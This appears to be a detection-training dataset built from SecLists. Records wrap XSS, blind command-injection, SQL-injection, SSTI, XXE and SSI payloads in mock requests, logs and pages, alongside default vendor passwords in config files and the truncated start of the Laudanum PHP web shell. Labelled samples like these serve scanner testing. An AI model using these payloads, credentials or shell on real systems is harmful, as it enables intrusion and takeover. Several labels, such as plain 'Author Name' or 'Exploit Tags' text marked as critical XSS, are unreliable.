"seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %3B%20str%3D%24%28echo%20YTYKPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20YTYKPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_02389", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<datalist onmousedown=\"alert(1)\">test</datalist> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<datalist onmousedown=\"alert(1)\">test</datalist>", "injection_type": "XSS"}}]} {"id": "seclists_02390", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><plaintext id=x tabindex=1 onfocusin=alert(1)></plaintext></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<plaintext id=x tabindex=1 onfocusin=alert(1)></plaintext>", "injection_type": "XSS"}}]} {"id": "seclists_02391", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: kishor</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: kishor", "injection_type": "XSS"}}]} {"id": "seclists_02392", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_02393", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ' UNION ALL SELECT", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' UNION ALL SELECT", "injection_type": "SQL"}}]} {"id": "seclists_02394", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rt id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></rt>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rt id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></rt>", "injection_type": "XSS"}}]} {"id": "seclists_02395", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=[&apos;] HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "[&apos;]", "injection_type": "cmd"}}]} {"id": "seclists_02396", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello 1/0</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "1/0", "injection_type": "SSTI"}}]} {"id": "seclists_02397", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: .mario HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: .mario", "injection_type": "XSS"}}]} {"id": "seclists_02398", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><picture id=x tabindex=1 onactivate=alert(1)></picture></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<picture id=x tabindex=1 onactivate=alert(1)></picture>", "injection_type": "XSS"}}]} {"id": "seclists_02399", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n&foo;", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "&foo;", "injection_type": "XXE"}}]} {"id": "seclists_02400", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><style>:target {color: red;}</style><acronym id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></acronym></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color: red;}</style><acronym id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></acronym>", "injection_type": "XSS"}}]} {"id": "seclists_02401", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, html breaking, basic</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, html breaking, basic", "injection_type": "XSS"}}]} {"id": "seclists_02402", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=stewart1\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "stewart1"}}]} {"id": "seclists_02403", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=));waitfor delay '0:0:__TIME__'-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "));waitfor delay '0:0:__TIME__'--", "injection_type": "SQL"}}]} {"id": "seclists_02404", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, XML injection, evil tags, gecko, obfuscated</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, XML injection, evil tags, gecko, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_02405", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<s onmouseleave=\"alert(1)\">test</s>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<s onmouseleave=\"alert(1)\">test</s>", "injection_type": "XSS"}}]} {"id": "seclists_02406", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=digital\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "digital"}}]} {"id": "seclists_02407", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<mark onmouseout=\"alert(1)\">test</mark>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<mark onmouseout=\"alert(1)\">test</mark>", "injection_type": "XSS"}}]} {"id": "seclists_02408", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<param onmouseover=\"alert(1)\">test</param> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<param onmouseover=\"alert(1)\">test</param>", "injection_type": "XSS"}}]} {"id": "seclists_02409", "source": "seclists", "source_license": "MIT", "text": "filename=%7Cecho%20VSTJXX$((81%2B22))$(echo%20VSTJXX)VSTJXX&", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7Cecho%20VSTJXX$((81%2B22))$(echo%20VSTJXX)VSTJXX&", "injection_type": "cmd"}}]} {"id": "seclists_02410", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Oracle,RMAIL,RMAIL,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,RMAIL,RMAIL,"}}]} {"id": "seclists_02411", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%2527%7C%20%5B%207%20-ne%20%24%28echo%20FMCMJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%7C%20%5B%207%20-ne%20%24%28echo%20FMCMJN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26", "injection_type": "cmd"}}]} {"id": "seclists_02412", "source": "seclists", "source_license": "MIT", "text": "filename=%27%7C%20%5B%208%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%7C%20%5B%208%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_02413", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><option id=x tabindex=1 onbeforeactivate=alert(1)></option></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<option id=x tabindex=1 onbeforeactivate=alert(1)></option>", "injection_type": "XSS"}}]} {"id": "seclists_02414", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZPLJWX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZPLJWX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_02415", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>@keyframes slidein {}</style><slot style=\"animation-duration:1s;animation-name:slidein;animation-iteration-count:2\" onanimationiteration=\"alert(1)\"></slot>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes slidein {}</style><slot style=\"animation-duration:1s;animation-name:slidein;animation-iteration-count:2\" onanimationiteration=\"alert(1)\"></slot>", "injection_type": "XSS"}}]} {"id": "seclists_02416", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>@keyframes slidein {}</style><section style=\"animation-duration:1s;animation-name:slidein;animation-iteration-count:2\" onanimationiteration=\"alert(1)\"></section>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes slidein {}</style><section style=\"animation-duration:1s;animation-name:slidein;animation-iteration-count:2\" onanimationiteration=\"alert(1)\"></section>", "injection_type": "XSS"}}]} {"id": "seclists_02417", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '' or ''-'';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or ''-'", "injection_type": "SQL"}}]} {"id": "seclists_02418", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:busted@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "busted"}}]} {"id": "seclists_02419", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>", "injection_type": "cmd"}}]} {"id": "seclists_02420", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"DATE_LOCAL\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"DATE_LOCAL\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02421", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=42*42 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "42*42", "injection_type": "SSTI"}}]} {"id": "seclists_02422", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<x onclick=alert(1)>click this! HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x onclick=alert(1)>click this!", "injection_type": "XSS"}}]} {"id": "seclists_02423", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: This vector indicates HTML injections by stroked text.</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector indicates HTML injections by stroked text.", "injection_type": "XSS"}}]} {"id": "seclists_02424", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<option onmouseleave=\"alert(1)\">test</option>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<option onmouseleave=\"alert(1)\">test</option>", "injection_type": "XSS"}}]} {"id": "seclists_02425", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %7C%20%5B%206%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%206%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22", "injection_type": "cmd"}}]} {"id": "seclists_02426", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:IBM,CSPUSER,<BLANK>,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "IBM,CSPUSER,<BLANK>,"}}]} {"id": "seclists_02427", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=AWARD,<BLANK>,g6PJ,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "AWARD,<BLANK>,g6PJ,"}}]} {"id": "seclists_02428", "source": "seclists", "source_license": "MIT", "text": "<?php\n/* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net>\n*** Tim Medin <tim@counterhack.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file provides shell access to the system. It is built based on the 2.1\n*** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler\n*** <mgeisler[at]mgeisler.net>\n***\n*** Updated by Tim Medin\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n*** \n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n*** \n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n\n// ***************** Config entries below ***********************\n\n// IPs are enterable as individual addresses TODO: add CIDR support\n$allowedIPs = array(\"192.168.1.55\", \"12.2.2.2\");\n\n# format is \"username\" => \"password\" \n# password is generated using sha1sum as shown below (don't forget the -n, KEVIN!)\n# echo -n Password1 | sha1sum\n$users = array(\"kevin\" => \"b441ac06613fc8d63795be9ad0beaf55011936ac\", \"tim\" => \"a94a1fe5ccb19ba61c4c0873d391e987982fbbd3\", \"yomamma\" => \"a94a1fe5ccb19ba61c4c0873d391e987982fbbd3\");\n\n# *********** No editable content below this line **************\n\n$allowed = 0;\nforeach ($allowedIPs as $IP) {\n if ($_SERVER[\"REMOTE_ADDR\"] == $IP)\n $allowed = 1;\n}\n\nif ($allowed == 0) {\n header(\"HTTP/1.0 404 Not Found\");\n die();\n}\n\n\n\n/* This error handler will turn all notices, warnings, and errors into fatal\n * errors, unless they have been suppressed with the @-operator. */\nfunction error_handler($errno, $errstr, $errfile, $errline, $errcontext) {\n /* The @-opertor (used with chdir() below) temporarely makes\n * error_reporting() return zero, and we don't want to die in that case.\n * We do note the error in the output, though. */\n if (error_reporting() == 0) {\n $_SESSION['output'] .= $errstr . \"\\n\";\n } else {\n die('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum PHP Shell Access</title>\n</head>\n<body>\n <h1>Fatal Error!</h1>\n <p><b>' . $errstr . '</b></p>\n <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>\n\n <hr>\n <address>\n Copyright &copy; 2014, <a\n href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br>\n Get the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n </address>\n\n</body>\n</html>');\n }\n}\n\nset_error_handler('error_handler');\n\n\nfunction logout() {\n $_SESSION = array('authenticated' => false);\n if (isset($_COOKIE[session_name()]))\n setcookie(session_name(), '', time()-42000, '/');\n session_destroy();\n}\n\n\nfunction stripslashes_deep($value) {\n if (is_array($value))\n return array_map('stripslashes_deep', $value);\n else\n return stripslashes($value);\n}\n\nif (get_magic_quotes_gpc())\n $_PO", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "shell.php"}}]} {"id": "seclists_02429", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %20d", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20d", "injection_type": "cmd"}}]} {"id": "seclists_02430", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = ') or benchmark(10000000,MD5(1))#';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ") or benchmark(10000000,MD5(1))#", "injection_type": "SQL"}}]} {"id": "seclists_02431", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, super short, obfuscated, gecko, __property__\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, super short, obfuscated, gecko, __property__", "injection_type": "XSS"}}]} {"id": "seclists_02432", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Lucent,locate,locatepw,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Lucent,locate,locatepw,"}}]} {"id": "seclists_02433", "source": "seclists", "source_license": "MIT", "text": "filename=%7C%20%5B%209%20-ne%20%24%28echo%20PENGWJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%209%20-ne%20%24%28echo%20PENGWJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_02434", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g", "injection_type": "cmd"}}]} {"id": "seclists_02435", "source": "seclists", "source_license": "MIT", "text": "filename=http://<yourservername>/", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "http://<yourservername>/", "injection_type": "cmd"}}]} {"id": "seclists_02436", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Backslash-obfuscated XBL injection - variant 3</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Backslash-obfuscated XBL injection - variant 3", "injection_type": "XSS"}}]} {"id": "seclists_02437", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">firefoxurl: uri exploit (UXSS)</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "firefoxurl: uri exploit (UXSS)", "injection_type": "XSS"}}]} {"id": "seclists_02438", "source": "seclists", "source_license": "MIT", "text": "filename=&&echo$IFSXUVPOU$((27%2B3))$(echo$IFSXUVPOU)XUVPOU%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&&echo$IFSXUVPOU$((27%2B3))$(echo$IFSXUVPOU)XUVPOU%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_02439", "source": "seclists", "source_license": "MIT", "text": "filename=|ls", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|ls", "injection_type": "cmd"}}]} {"id": "seclists_02440", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=to_timestamp_tz HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "to_timestamp_tz", "injection_type": "SQL"}}]} {"id": "seclists_02441", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC=\u201dhttp://badguy.com/a.jpg\u201d> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC=\u201dhttp://badguy.com/a.jpg\u201d> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo", "injection_type": "XSS"}}]} {"id": "seclists_02442", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Osicom,guest,User,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Osicom,guest,User,"}}]} {"id": "seclists_02443", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%22%26%26echo%20FNCMMT$((70%2B94))$(echo%20FNCMMT)FNCMMT| HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%26%26echo%20FNCMMT$((70%2B94))$(echo%20FNCMMT)FNCMMT|", "injection_type": "cmd"}}]} {"id": "seclists_02444", "source": "seclists", "source_license": "MIT", "text": "filename=%7C%20%5B%207%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%207%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//", "injection_type": "cmd"}}]} {"id": "seclists_02445", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'hi' or 'a'='a';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "hi' or 'a'='a", "injection_type": "SQL"}}]} {"id": "seclists_02446", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Minolta QMS,admin,<BLANK>,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Minolta QMS,admin,<BLANK>,"}}]} {"id": "seclists_02447", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)", "injection_type": "SQL"}}]} {"id": "seclists_02448", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>@keyframes slidein {}</style><p style=\"animation-duration:1s;animation-name:slidein;animation-iteration-count:2\" onanimationiteration=\"alert(1)\"></p> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes slidein {}</style><p style=\"animation-duration:1s;animation-name:slidein;animation-iteration-count:2\" onanimationiteration=\"alert(1)\"></p>", "injection_type": "XSS"}}]} {"id": "seclists_02449", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Lenel,admin,admin,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Lenel,admin,admin,"}}]} {"id": "seclists_02450", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Author Name: kishor</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: kishor", "injection_type": "XSS"}}]} {"id": "seclists_02451", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Oracle,STARTER,STARTER,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,STARTER,STARTER,"}}]} {"id": "seclists_02452", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><shadow id=x tabindex=1 onactivate=alert(1)></shadow></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<shadow id=x tabindex=1 onactivate=alert(1)></shadow>", "injection_type": "XSS"}}]} {"id": "seclists_02453", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, evil tags, obfuscated, style injection</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated, style injection", "injection_type": "XSS"}}]} {"id": "seclists_02454", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: No filter 